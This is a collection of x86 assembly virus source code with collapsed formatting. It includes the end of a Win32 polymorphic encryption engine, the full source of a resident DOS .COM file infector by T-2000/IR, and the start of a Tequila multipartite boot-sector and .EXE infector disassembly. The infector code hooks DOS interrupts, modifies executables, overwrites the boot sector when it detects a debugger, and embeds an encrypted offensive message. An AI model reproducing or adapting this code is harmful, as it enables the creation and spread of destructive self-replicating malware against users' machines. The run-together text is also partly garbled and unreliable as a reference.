;--------SUB-----mov al , 081h ;make a SUB reg, rndvalueadd ah, 0e8hstoswcall get_rnd32stosd;----------------
sub ebx , eax ;Save the cryptkey
getregforsize :call getrndalcmp al , 4 ;do not use ESPje getregforsizecmp al , cl ;nor keyregje getregforsizecmp al , ch ;nor offsetregje getregforsize
mov dh, al
call gengarbage
;----MOVSIZE----- ;mov ecx,virussize (size to decrypt)add al , 0b8hstosbmov eax , virusz / 4stosd;----------------
;*** AT THIS POINT IS EDI THE OFFSET FOR THE JMP ***
mov esi , edi
;8b + 00, eax=3,[eax=0] ch = reg2
getregtoxor : ;This reg will contain crypted code and'll be xoredcall getrndalcmp al , 4 ;do not use ESPje getregtoxorcmp al , clje getregtoxor ;do not use the keyregcmp al , chje getregtoxor ;do not use the offset regcmp al , dhje getregtoxor
mov dl , al
call gengarbage
;-MOV REG3,[REG2] ;make a mov reg3,[reg2] reg2 =offset codeshl al , 3or al , chmov ah, 08bhxchg al , ahstosw;----------------
call gengarbage
;-XOR REG3,REG1-- ;make a xor reg3,reg1 reg1= keymov al , dlshl al , 3or al , cladd al , 0c0hmov ah, 33hxchg al , ahstosw;----------------
call gengarbage
mov al , dl
;-MOV [REG2],REG3 ;make a mov [reg2],reg3 reg 2=offset code shl al , 3or al , chmov ah, 089hxchg al , ahstosw;----------------
call gengarbage
;-ADD REG2,4----- ;adds 4 to the offset regis termov al , 83hstosbmov ax , 004c0hadd al , chstosw;----------------
call gengarbage
;---DEC REG4----- ;decreases counter reg4 (si ze)mov al , dhadd al , 048hstosb;----------------
mov eax , 9c66h ;pushf
stosw
call gengarbage
inc ah ;popfstosw
;---JZ OVER------mov ax , 074hstoswpush edi;----------------
mov eax , edi ;can't generate > 80h-5 bytes of garbage regenerate : ;between JZ beh - poly - JMP - beh: code...
mov edi , eax ;restore EDI for ja
call gengarbage
mov edx , edisub edx , eaxcmp edx , 080h - 5 ;80h = max JZ distance, 5 is size of JMP BACKja regenerate
;----JMP BACK----sub esi , edimov al , 0e9hstosbmov eax , 0fffffffbhadd eax , esistosd;----------------
;----PATCH JZ----pop esi ;esi-1 = jz value
mov eax , edisub eax , esimov byte ptr [ esi - 1], al
;----------------
call gengarbage
;----POPAD-------mov al , 61h ;popadstosb;----------------
call gengarbage
;----PATCH LEA--- pop esi ;patch LEA reg1,[EAX+startofcrypted]push edi
sub edi , offset viruscopy - startsub edi , ebpmov dword ptr [ esi +2], edipop edi;----------------
mov ecx , virusz / 4 ;copy encrypted virus code after polymov esi , ebp ;decryptors
cryptit :lodsdxor eax , ebxstosdloop cryptit
sub edi , offset viruscopy - startsub edi , ebpmov ecx , edi ;virus size + poly in ECX
pop edipop esipop edxpop ebxpop eaxret
;-------------------------------------------------- --------------------------;; Generates lot of rnd instructions which loo k good but do nothing; (they undo themself indirect);-------------------------------------------------- --------------------------;
gengarbage :push eaxpush ebxpush ecxpush edxpush esi
garbageloop :
call get_rnd32
and al , 1111b
cmp al , 1je genadd ;OK
cmp al , 2je gensub ;OK
cmp al , 3je genxor ;OK
cmp al , 4je genmov ;OK
cmp al , 5je genpush ;OK
cmp al , 6je geninc ;OK
cmp al , 7je gendec ;OK
cmp al , 8je gencmp ;OK
cmp al , 9je genjunk ;OK
cmp al , 0ehjb garbageloop
exitgen :
pop esipop edxpop ecxpop ebxpop eax
ret
;-------------------------------------------------- ---------------------------; Generates random add;-------------------------------------------------- ---------------------------genadd :
call getrndal
cmp al , 4je genadd ;4 = esp, leave him alone
cmp ah, 80hjb addandsub ;generate an add - code - sub
and eax , 111b
cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetoadd ;yep
call pushregister
call gengarbage
call randomadd ;adds a value or register
call gengarbage
call popregister
jmp exitgen
savetoadd :call randomadd
jmp exitgen
addandsub :push eax
xchg al , ahmov al , 081hadd ah, 0c0h
stoswpush eax
call get_rnd32stosdpush eax
call gengarbage
pop ebxpop eax
add ah, 028hstoswmov eax , ebxstosd
pop eaxjmp exitgen
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random sub;-------------------------------------------------- ---------------------------gensub :
call getrndal
cmp al , 4je gensub ;4 = esp, leave him alone
cmp ah, 80hjb subandadd ;generate an add - code - sub
and eax , 111b
cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetosub ;yep
call pushregister
call gengarbage
call randomsub ;adds a value or register
call gengarbage
call popregister
jmp exitgen
savetosub :
call randomsub
jmp exitgen
subandadd :
push eax
xchg al , ahmov al , 081hadd ah, 0e8h
stoswpush eax
call get_rnd32stosdpush eax
call gengarbage
pop ebxpop eax
sub ah, 028hstoswmov eax , ebxstosd
pop eax
jmp exitgen;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random xor;-------------------------------------------------- ---------------------------genxor :
call getrndal
cmp al , 4je genxor
cmp ah, 80hjb genxorxor ;generate an xor - code - xor
and eax , 111b
cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetoxor ;yep
call pushregister ;first push
call gengarbage ;generate some garbage
call randomxor ;xors with a value or register
call gengarbage ;generate some garbage
call popregister ;and pop it
jmp exitgen
savetoxor :
call randomxor
jmp exitgen
genxorxor :push eax
xchg al , ahadd ah, 0f0h
mov al , 081h
stoswpush eax
call get_rnd32stosdpush eax
call gengarbage
pop ebxpop eax
stosw
mov eax , ebx
stosd
pop eaxjmp exitgen
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random mov;-------------------------------------------------- ---------------------------genmov:
call getrndal
cmp al , 4je genmov
and eax , 111b ; eax <- al
cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetomov ;yep
call pushregister ;first push
call gengarbage ;generate some garbage
call randommov ;movs a value or register
call gengarbage ;generate some garbage
call popregister ;and pop it
jmp exitgen
savetomov :
call randommov
jmp exitgen;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random push;-------------------------------------------------- ---------------------------genpush :
call getrndal
cmp al , 4je genpush
and eax , 111b
call pushregister
call gengarbage
call popregister
jmp exitgen;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random inc;-------------------------------------------------- ---------------------------geninc : ;40
call getrndalcmp al , 4je geninc
cmp ah, 80hja genincdec
and eax , 111b
cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetoinc
call pushregister
call gengarbage
add al , 040hstosb
call gengarbage
sub al , 040h
call popregister
jmp exitgen
savetoinc :add al , 040hstosbjmp exitgen
genincdec :add al , 40h ;incstosb
call gengarbage
add al , 8 ;decstosb
jmp exitgen
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random dec;-------------------------------------------------- ---------------------------gendec : ;48
call getrndalcmp al , 4je gendec
cmp ah, 80hja gendecinc
and eax , 111b
cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetodec
call pushregister
call gengarbage
add al , 048hstosb
call gengarbage
sub al , 048h
call popregister
jmp exitgen
savetodec :add al , 048hstosbjmp exitgen
gendecinc :add al , 48hstosb
call gengarbage
sub al , 8hstosbjmp exitgen
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Pushes register in al;-------------------------------------------------- ---------------------------pushregister :
push eax
inc byte ptr [ ebp+offset pushtable +eax - start ] ;set flag for reg.
add al , 050hstosb
pop eaxret
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Pops register in al;-------------------------------------------------- ---------------------------popregister :
push eax
dec byte ptr [ ebp+offset pushtable +eax - start ] ;unflag for reg.
add al , 058hstosb
pop eaxret
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random add reg, value or add reg1 ,reg2 - reg = al;-------------------------------------------------- ---------------------------randomadd :
push eax
call get_rnd32
cmp al , 80hpop eaxpush eaxja addregreg
call randomaddvalue
rndaddb :pop eaxret
addregreg :call randomaddregjmp rndaddb
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random add reg,value - reg = al;-------------------------------------------------- ---------------------------
; 81 c0+reg value; reg = eax 05 value
randomaddvalue :push eax
or al , al ;reg = eax?jz addeax ;special
xchg al , ahmov al , 081hadd ah, 0c0h
stosw
backfromaddeax :
call get_rnd32
stosd
pop eaxret
addeax :
mov al , 05hstosbjmp backfromaddeax
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random add reg1,reg2 - reg1 = al ;-------------------------------------------------- ---------------------------randomaddreg :
push eax
mov bl , al
call getrndal
shl bl , 3
or al , bl ;mix instructions
add al , 0c0hmov ah, 03hxchg ah, al
stosw
pop eaxret
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random sub reg, value or sub reg1 ,reg2 - reg = al;-------------------------------------------------- ---------------------------randomsub :
push eax
call get_rnd32
cmp al , 80hpop eaxpush eaxja subregreg
call randomsubvalue
rndsubb :pop eaxret
subregreg :call randomsubreg
jmp rndsubb
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random sub reg,value - reg = al;-------------------------------------------------- ---------------------------
; 81 c0+reg value; reg = eax 05 value
randomsubvalue :push eax
or al , al ;reg = eax?jz subeax ;special
xchg al , ahmov al , 081hadd ah, 0e8h
stosw
backfromsubeax :
call get_rnd32
stosd
pop eaxret
subeax :
mov al , 05hstosbjmp backfromsubeax
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates random sub reg1,reg2 - reg1 = al ;-------------------------------------------------- ---------------------------randomsubreg :
push eax
mov bl , al
call getrndal
shl bl , 3
or al , bl ;mix instructions
add al , 0c0hmov ah, 03hxchg ah, al
stosw
pop eax
ret;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates a xor reg, value or xor reg, reg2 - reg = al;-------------------------------------------------- ---------------------------randomxor :
push eaxcall get_rnd32cmp al , 80hpop eaxpush eaxja xorvalue
call randomxorreg
rndxorr :
pop eaxret
xorvalue :
call randomxorvaluejmp rndxorr
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates a random xor reg,reg2 - reg = al;-------------------------------------------------- ---------------------------randomxorreg :
push eax ;6633
mov bl , al
call getrndal
shl bl , 3
or al , bl ;mix instructions
add al , 0c0hmov ah, 033h
xchg ah, al
stosw
pop eaxret
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates a random xor reg,value;-------------------------------------------------- ---------------------------randomxorvalue :
push eax
add al , 0f0h
mov ah, 081h
xchg al , ah
stosw
call get_rnd32
stosd
pop eaxret
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; generates a random mov reg,value or reg,reg 2;-------------------------------------------------- ---------------------------randommov:
push eax
cmp ah, 080hjb movreg
call randommovvalue
movback :
pop eaxret
movreg :call randommovregjmp movback
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generates a random mov reg,value;-------------------------------------------------- ---------------------------randommovvalue :
push eax
add al , 0b8h
stosb
call get_rnd32
stosd
pop eaxret
;-------------------------------------------------- ---------------------------; generates a random mov reg,reg2;-------------------------------------------------- ---------------------------randommovreg : ;8b (c0+reg) or reg2
push eaxmov bl , al
call getrndal
shl bl , 3
or al , bl ;mix instructions
xchg ah, al
mov al , 08bhadd ah, 0c0h
stosw
pop eaxret
;-------------------------------------------------- ---------------------------; generates a random cmp reg,reg2 or cmp reg, value;-------------------------------------------------- ---------------------------gencmp: ;39/3b
call get_rnd32
cmp ah, 0c0hjb gencmp
cmp al , 80hja gencmpvalue
push eax
call get_rnd32mov bh, 039hcmp al , 80hja gencmp1add bh, 2
gencmp1:
pop eax
mov al , bh
cldstoswjmp exitgen
gencmpvalue : ;81f8
and eax , 0111badd ax , 081f8h
xchg al , ah
stosw
call get_rnd32
stosdjmp exitgen
;-------------------------------------------------- ---------------------------
;-------------------------------------------------- ---------------------------; Generate junk f8 - fd;-------------------------------------------------- ---------------------------genjunk :
call get_rnd32cmp al , 0f8hjb genjunkcmp al , 0fdhja genjunk
stosb
jmp exitgen;-------------------------------------------------- ---------------------------
getrndal :call get_rnd32and al , 111bret
rdtcs equ <dw 310Fh >
get_rnd32 : ;main part by GriYo / 29Apush ecxpush ebxpush edxpush edipush esi
mov eax ,dword ptr [ ebp+rnd32_seed - start ]mov ecx , eaximul eax , 41C64E6Dhadd eax , 00003039hmov dword ptr [ ebp+rnd32_seed - start ], eax
xchg eax , ecxrdtcs ;just 4 some xtra randomnessxchg eax , ecxxor eax , ecx
pop esipop edipop edxpop ebxpop ecxret
polyend :
db "(c)" ;just some junk
end :
;-------------------------------------------------- --------------------------;
pointertope dd ?
if debug eq 1death dd ? ;kill ourself flagendif
busy dd ?filename db 100h dup ( 0h)peheader db 1024 dup ( 0h)whereappend dd ?pushtable db 8 dup ( 0h)
viruscopy db ( virusz +1000 ) dup ( 0h) ;virussize + poly
memend:
_CODE ends
;-------------------------------------------------- --------------------------;
;-------------------------------------------------- --------------------------;_DATA segment dword use32 public 'DATA'fill db ?_DATA ends_burp segment dword use32 public 'LiFEwiRE'fill2 db ?_burp ends;-------------------------------------------------- --------------------------;
end startend
; Resident .COM midfile infector - 666 bytes - 02/2 000 by T-2000/IR.; Uses the INT 21h ISR to locate a suitable place t o put the CALL_Virus.
.286
.MODEL TINY
.CODE
Virus_Size EQU ( End_Body - START)Virus_Size_Mem EQU ((( End_Heap- START)+ 15)/ 16)
START:PUSHF ; Save registers.PUSHAPUSH DSPUSH ES
CALL Get_IP
; Encrypted with XOR 66h:; "If Jesus was fucked to death, all xtians would be wearing tiny dildo's"; (pardon my sense of humour :)
Message DB 6Bh, 6Ch, 2Fh, 00h , 46h , 2Ch, 03hDB 15h , 13h , 15h , 46h , 11h , 07h , 15hDB 46h , 00h , 13h , 05h , 0Dh, 03h , 02hDB 46h , 12h , 09h , 46h , 02h , 03h , 07hDB 12h , 0Eh, 4Ah, 46h , 07h , 0Ah, 0AhDB 46h , 1Eh, 12h , 0Fh, 07h , 08h , 15hDB 46h , 11h , 09h , 13h , 0Ah, 02h , 46hDB 04h , 03h , 46h , 11h , 03h , 07h , 14hDB 0Fh, 08h , 01h , 46h , 12h , 0Fh, 08hDB 1Fh, 46h , 02h , 0Fh, 0Ah, 02h , 09hDB 41h , 15h , 6Bh, 6Ch, 61h , 66h
Get_IP : POP SI ; Calculate delta offset.SUB SI , ( Message - START)
MOV AH, 30h ; Get DOS version.INT 21h
CMP AL, 4 ; We need DOS 4.xx or above.JB Restore_Host
MOV AX, 2000h ; Virus residency check.INT 21h
XCHG CX, AX ; Already up there?JCXZ Restore_Host ; Then abort further install.
MOV AH, 43h ; Soft-Ice residency check.INT 68h
CMP AX, 0F386h ; Active?JZ Trash_Boot
; (This works in Win32 aswell tho you have to encap sulate it; with a SEH as the INT 68h will GPF if Soft-Ice ai n't loaded).
Alloc_Memory : XOR CX, CX
Alloc_Block : MOV AH, 48h ; Attempt to allocate memory.MOV BX, Virus_Size_MemINT 21h
JNC Init_Block
DEC CX ; CX = -1JNP Restore_Host ; Endless loop?
MOV AH, 4Ah ; Get blocksize of ES.MOV BX, CXINT 21h
MOV AH, 4Ah ; Create room for the virus.SUB BX, Virus_Size_Mem +1INT 21hJNC Alloc_Block
JMP Restore_Host ; And attempt allocation.
Init_Block : MOV ES, AX ; ES = allocated block.
DEC AX ; DS = MCB allocated block.MOV DS, AX
XOR DI , DI
MOV WORDPTR DS:[ DI +1], 8 ; Disguise block as system.
MOV CX, ( Virus_Size / 2) ; Copy viruscode up there.SEGCSREP MOVSW
PUSH ES
MOV AX, 3521h ; Get INT 21h.INT 21h
PUSH ESPOP DS
MOV AX, 2566h ; Revector it to INT 66h.MOV DX, BXINT 21h
POP DS
MOV Busy_Switch , CL ; Clear busy flag.
MOV AL, 21h ; Hook INT 21h.MOV DX, OFFSET New_Int21hINT 21h
Restore_Host : PUSH SS ; So we can STOS to SS.POP ES
MOV BP, SP ; Setup stack pointer.
MOV DI , [ BP+( 11* 2)] ; CALL_Virus return address.
SUB DI , 3 ; Offset of CALL_Virus.
MOV [ BP+( 11* 2)], DI ; Re-execute it later.
MOV AL, NOT 0C3h ; Encrypted original byte.Host_Byte = BYTE PTR $- 1
NOT AL ; Decrypt byte.
STOSB ; Restore byte in memory.
MOV AX, 9090h - 1 ; Encrypted original word.Host_Word = WORDPTR $- 2
INC AX ; Decrypt word.STOSW ; Restore word in memory.
POP ES ; Restore original registers.POP DSPOPAPOPF
RETN ; And re-execute, fixed code.
Trash_Boot :MOV AL, 2 ; Trash the bootsector of C:.MOV CX, 1XOR DX, DXSEGCS ; Stupid anti-TBClean trick.INT 26h
INT 19h ; Reboot the system.
New_Int21h :CMP AX, 2000h ; Virus residency call.JNE Check_Exit
CBW ; AX = 0.
IRET ; And return.
Check_Exit : PUSHA ; Save all regs.PUSH DSPUSH ES
OR AH, AH ; Program terminate?JZ Check_Timer
CMP AH, 4Ch ; Program terminate?JNE Check_Debugger
Check_Timer : IN AX, 40h ; Get a random value.
ADD AL, AH ; 1/256 chance of displayingJNZ Check_Debugger ; text message.
MOV AH, 0EhMOV SI , OFFSET Message
Display_Char : SEGCS ; Fetch next encrypted byte.LODSB
XOR AL, 66h ; Displayed all so far?JZ Check_Debugger ; Then bail.
INT 10h ; BIOS display character.
JMP Display_Char ; Go on.
Check_Debugger : XOR DI , DI
MOV DS, DI ; Get 1st instruction ofLDS SI , DS:[ DI +( 01h* 4)] ; INT 01h.LODSB
MOV AH, AL ; Save it in AH.
MOV DS, DI ; Get 1st instruction ofLDS SI , DS:[ DI +( 03h* 4)] ; INT 03h.LODSB
XOR AX, 0CFCFh ; if they're not IRET thenJNZ Trash_Boot ; a debugger has hooked them.
Check_Caller : INT 01h ; Annoying break.
JMP $ ; Bail if we're busy already.Busy_Switch = BYTE PTR $- 1
INC CS: Int_Count ; Only examine INTs randomlyJS Exit_ISR ; to prevent slowdowns.JP Exit_ISR
MOV BP, SPMOV DS, [ BP+( 11* 2)] ; DS = CS of calling INT 21h.
XCHG SI , AX ; SI = 0.
CMP DS:[ SI ], 20CDh ; Verify it's a .COM-PSP.JNE Exit_ISR
; Set the busy flag so we don't get interrupted.
MOV CS: Busy_Switch , ( Exit_ISR - Busy_Switch )- 1
MOV AH, 62h ; Get current PSP.INT 66h
CMP BX, [ BP+( 11* 2)] ; Caller's CS == PSP ?JNE Clear_Busy ; Else it ain't no .COM.
IN AX, 40h ; Get a random number.ADD AL, AH
CMP AL, 150 ; Infect the program here?JNB Clear_Busy ; Nope, maybe next time.
MOV DS, DS:[ SI +2Ch] ; .COM's environment block.
Scan_For_Name : LODSW ; Scan for the end of allDEC SI ; settings, after which
; the full path to theOR AX, AX ; currently executing programJNZ Scan_For_Name ; resides.
CALL Infect_File
Clear_Busy : AND CS: Busy_Switch , 0 ; Open for business again..
Exit_ISR : POP ES ; Restore the regs.POP DSPOPA
Do_Old_Int21h : INT 66h ; Call the original INT 21h.
RETF 2 ; And return with new flags.
Seek_EOF:MOV AX, 4202h ; Seek to the end of file.XOR CX, CXCWDINT 66h
DB 0CDh, 03h ; Annoying break.
Do_RETN: RETN
Infect_File :MOV AX, 4300h ; Get file's attributes.LEA DX, [ SI +3]INT 66hJC Do_RETN
IN AL, 21h ; Lock the keyboard.OR AL, 00000010bOUT 21h , AL
INT 01h ; Hang the possible debugger.
PUSH DS ; Save path and attributes.PUSH DXPUSH CX
AND CL, 00000110b ; Leave system & hidden filesJZ Clear_Readonly ; alone (and clear r/o bit).
JMP_Nop_Attr : JMP Nop_Attr_Rest ; Fix stack but don't restore; attributes.
Clear_Readonly : MOV AX, 4301h ; Clear possible r/o bit.INT 66hJC JMP_Nop_Attr
MOV AX, 3D02h ; Open file for read/write.INT 66hJNC Save_Handle
JMP Restore_Attr
Save_Handle : XCHG BX, AX ; Save filehandle in BX.
PUSH CSPOP DS
MOV SI , OFFSET Header
MOV AH, 3Fh ; Read first 4 bytes of .COM.MOV CL, 4MOV DX, SIINT 66hJNC Verify_Read
JMP_Close_File : JMP Close_File
Verify_Read : CMP AX, CX ; All 4 bytes we're read?
JNE JMP_Close_File
CALL Seek_EOF ; Get filesize.
DEC DX ; .COM is over 64k ?JNS JMP_Close_File ; Then bail, obviously.
CMP AX, ( 63* 1024 ) ; .COM is too big?JA JMP_Close_File
CMP AX, ( 4* 1024 ) ; Or too small?JB JMP_Close_File
INC WORDPTR [ SI +2] ; Don't infect .SYS-files.JZ JMP_Close_File
CMP [ SI ], 'ZM' +1 ; Ditto for .EXE-files.JE JMP_Close_File
CMP [ SI ], 'MZ' +1JE JMP_Close_File
MOV AX, 4202h ; Seek to the last 7 bytesDEC CX ; of the .COM-file, thisMOV DL, - 7 ; is where the possibleINT 66h ; ENUNS-string is located.
; My Win98 .COM-files have the ENUNS changed to NLD NS, so just; checking for ENUNS would not work with these. Jus t treath every; .COM-file as a ENUNS protected file and you're al l set.
MOV AH, 3FhMOV CX, 7MOV DX, OFFSET Checksum_IDINT 66h
; Adjust the file's checksum.
ADD Checksum_Word , Virus_Size
CALL Seek_EOF
LES DI , [ BP+( 2* 10)] ; ES:DI = CS:IP of the next; instruction in the target.
MOV DX, DIDEC DH ; Minus PSP (100h).
CMP DX, AX ; IP points into the image?JNB JMP_Close_File ; Else bail out.
SUB AX, DX ; Calculate displacement.SUB AX, 3
MOV BP, OFFSET CALL_Virus
MOV CS:[ BP+1], AX ; CALL_Virus displacement.
PUSH DX
MOV AX, 4200h ; Seek to the insert offset.XOR CX, CXINT 66h
MOV SI , OFFSET Header
MOV AH, 3Fh ; Read the original bytes.MOV CL, 3MOV DX, SIINT 66h
POP DX
CMPSB ; Code in memory is the sameJNE Close_File ; as on disk?
CMPSW ; This avoids infectingJNE Close_File ; packed files, etc.
SUB SI , 3
LODSB ; Get 1st byte, encrypt andNOT AL ; save it.MOV Host_Byte , AL
LODSW ; Do the same with the nextDEC AX ; word.MOV Host_Word , AX
MOV AX, 4200h ; Seek to the insert offsetXOR CX, CX ; again.INT 66h
MOV AX, 5700h ; Get file's date & time.INT 66hJC Close_File
MOV AL, CL ; Mask-out seconds.AND AL, 00011111b
CMP AL, ( 6/ 2) ; 6 seconds (infected) ?JE Close_File ; Then abort.
XCHG CX, AX ; Put CX in AX.
AND AL, 11100000b ; Clear seconds field.OR AL, ( 6/ 2) ; Set 6 seconds.
PUSH AX ; Save the file date & timePUSH DX ; on the stack for later.
MOV AH, 40h ; Write the CALL_Virus intoMOV CX, 3 ; the file.MOV DX, BPINT 66hJC Restore_Date
CALL Seek_EOF
MOV AH, 40h ; Append virusbody to theMOV CX, Virus_Size ; target file. (DX=0).INT 66h
Restore_Date : MOV AX, 5701h ; Restore file date & time.POP DXPOP CX
INT 66h
Close_File : MOV AH, 3Eh ; Close the file.INT 66h
Restore_Attr : MOV AX, 4301h ; Restore file's attributes.CMP AX, 0ORG $- 2
Nop_Attr_Rest : MOV AH, 19h ; Nop (get current drive).POP CXPOP DXPOP DSINT 66h
Exit_Infect : CMP AX, 545Bh ; Executable text string,XOR CH, [ BX] ; '=[T2/IR]='. Very effectiveDEC CX ; against lame text patching.PUSH DXPOP BPCMP AX, 0DEADh
IN AL, 21h ; Reverse state of keyboard,XOR AL, 00000010b ; it'll lock if a debuggerOUT 21h , AL ; has skipped the 1st lock.
INT 03h ; Hang the possible debugger.
RETN
CALL_Virus DB 0E8h ; CALL opcode.DW 0
Checksum_ID DB 5 DUP( 0) ; Usually 'ENUNS'.Checksum_Word DW 666 ; Checksum itself.
End_Body :
Int_Count DB 0Header DB 4 DUP( 0)
End_Heap: ; So it's lame.. a lame virus for a lame person..; Haven't bothered optimizing the code structure to; the max, no time nor desire, sorry.. Remember, th is; is just a demonstration virus....
; Amen.
END START
; Tequila.2468.A (exact) disasm.; Multipartite semi-stealth polymorphic MBS & .EXE- infector.; Bugs marked with '***'.; T-2000/IR, March 2000.
.MODEL TINY
.STACK 512
.CODE
Virus_Size EQU ( End_Body - START)Virus_Size_512 EQU (( End_Body - START)+ 511 )/ 512Virus_Size_1024 EQU (( End_Body - START)+ 1023 )/ 1024Virus_Size_Mem EQU (( End_Heap- START)+ 15)/ 16
START:
Host_IP DW OFFSETCarrierHost_CS DW ( 256 / 16)Host_SS DW ( 256 / 16)
Infect_Year DW 0 ; Year of MBS infection.Infect_MD DW 0 ; Month & day of MBS infection.
Tunnel_Success DB 0 ; DOS' INT 13h found boolean.
Word_16 DW 16 ; Used for MUL/DIV operations.Word_512 DW 512Word_250 DW 250Byte_12 DB 12
Message DB 0Dh, 0Ah, 0Dh, 0AhDB 'Welcome to T.TEQUILA''s latest production.' , 0Dh, 0AhDB 'Contact T.TEQUILA/P.o.Box 543/6312 St''hausen/Swit zerland.' , 0Dh, 0AhDB 'Loving thoughts to L.I.N.D.A' , 0Dh, 0Ah, 0Dh, 0AhDB 'BEER and TEQUILA forever !' , 0Dh, 0Ah, 0Dh, 0Ah, '$'
Hint DB 'Execute: mov ax, FE03 / int 21. Key to go on!'
; Tequila's activation routine, it's supposed to ac tivate on the same day; as the MBS infection took place, 3 or more months later, when it will; draw a colorful mandelbrot set consisting out of ASCII characters, and; display a message.
Check_Activate :PUSH BP
MOV BP, SP
SUB SP, ( 6* 2) ; Reserve 12 bytes on the; stack.
PUSH AXPUSH BXPUSH CXPUSH DXPUSH SIPUSH DIPUSH ESPUSH DS
PUSH CSPOP DS
MOV AX, Infect_Year ; Year of MBS infection.
INC AX ; Skip all further checks?JZ JMP_Exit_Act ; Yep.
DEC AX ; We're in countdown mode?JNZ Check_Date ; Nope.
DEC Infect_MD ; 3 program exits so far?JNZ JMP_Exit_Act ; Else bug out.
JMP Init_Video_Seg ; Do the effect.
Check_Date : MOV AH, 2Ah ; Get the current date.CALL Do_Old_Int21h
MOV SI , CX ; SI = year count.
MOV CX, Infect_MD
CMP CL, DL ; Same day as infection?JNE Disable_Check
MOV AX, SI ; AX = current year count.
SUB AX, Infect_Year ; Minus the year count of; MBS infection.
MUL Byte_12 ; Calculate total count of; months in year count.
ADD AL, DH ; Plus current month.; AL = amount of months since; MBS infection took place.
ADD CH, 3 ; Infection date + 3 months.
CMP AL, CH ; 3 months have passed?JAE Enable_Call ; Then enable the payload.
Disable_Check : MOV Infect_Year , - 1 ; Don't check the dateJMP JMP_Exit_Act ; anymore.
Enable_Call : MOV Infect_Year , 0 ; Signal that the payload; can activate and the 0FE03h; call can be accepted.
MOV Infect_MD , 3 ; Countdown timer, wait 3; program exits before; activation.
JMP_Exit_Act : JMP Exit_Activate
Init_Video_Seg : MOV BX, 0B800h ; VGA video segment.
INT 11h ; Get equipment status.
AND AX, 0000000000110000b ; Mask out video state.
CMP AX, 0000000000110000b ; 80x25 monochrome?JNE Set_Video_Seg
MOV BX, 0B000h ; Monochrome video segment.
Set_Video_Seg : MOV ES, BX
; I didn't bother commenting the effect as I don't have a clue of what the; fuck it's doing. Besides, graphical payloads are for lamers anyways....
XOR BX, BX
MOV DI , 0FD8Fh
LOC_9: MOV SI , 0FC18h
LOC_10: MOV [ BP-( 1* 2)], SIMOV [ BP-( 2* 2)], DI
MOV CX, 30
LOCLOOP_11: MOV AX,[ BP-( 1* 2)]IMUL AX ; dx:ax = reg * ax
MOV [ BP-( 4* 2)], AXMOV [ BP-( 3* 2)], DX
MOV AX, [ BP-( 2* 2)]IMUL AX ; dx:ax = reg * ax
MOV [ BP-( 6* 2)], AXMOV [ BP-( 5* 2)], DX
ADD AX, [ BP-( 4* 2)]ADC DX, [ BP-( 3* 2)]
CMP DX, 15JAE LOC_12
MOV AX, [ BP-( 1* 2)]IMUL WORDPTR [ BP-( 2* 2)] ; dx:ax = data * axIDIV Word_250 ; ax,dxrem=dx:ax/data
ADD AX, DIMOV [ BP-( 2* 2)], AX
MOV AX, [ BP-( 4* 2)]MOV DX, [ BP-( 3* 2)]
SUB AX, [ BP-( 6* 2)]SBB DX, [ BP-( 5* 2)]IDIV Word_512
ADD AX, SIMOV [ BP-( 1* 2)], AX
LOOP LOCLOOP_11
LOC_12: INC CXSHR CL, 1
MOV CH, CLMOV CL, 0DBhMOV ES:[ BX], CX
INC BXINC BX
ADD SI , 18
CMP SI , 1B8hJL LOC_10
ADD DI , 52
CMP DI , 2A3hJL LOC_9
XOR DI , DI ; Display the hint on screen.MOV SI , OFFSET HintMOV CX, ( Check_Activate - Hint )CLD
Write_Char : MOVSB ; Put a byte in video RAM.INC DI ; Don't change the attribute.
LOOP Write_Char ; Do the entire string.
XOR AX, AX ; Wait for a keypress.INT 16h
Exit_Activate : POP DSPOP ESPOP DIPOP SIPOP DXPOP CXPOP BXPOP AX
MOV SP, BPPOP BP
RETN
; This displays Tequila's message.Display_Message :
PUSH DXPUSH DS
PUSH CSPOP DS
MOV AH, 09h ; Display string.MOV DX, OFFSET MessageCALL Do_Old_Int21h
POP DSPOP DX
RETN
; This get's inserted into MBS'ses.MBS_Loader :
CLI
XOR BX, BX ; Zero DS.MOV DS, BX
MOV SS, BX ; Setup a stack.MOV SP, 7C00h
STI
XOR DI , DI
; Steal 3k of DOS memory to go resident into.
SUB WORDPTR DS:[ 413h ], Virus_Size_1024INT 12h
MOV CL, 6 ; Calculate segment to goSHL AX, CL ; resident into.
MOV ES, AX ; Push relocated address.PUSH ES
MOV AX, OFFSET Relocated_BootPUSH AX
; Read the virusbody off disk.
MOV AX, 0200h +Virus_Size_512MOV CX, DS:[ 7C00h+( Home_ST- MBS_Loader )]
INC CXMOV DX, DS:[ 7C00h+( Home_HD- MBS_Loader )]INT 13h
RETF ; Jump to the relocated code.
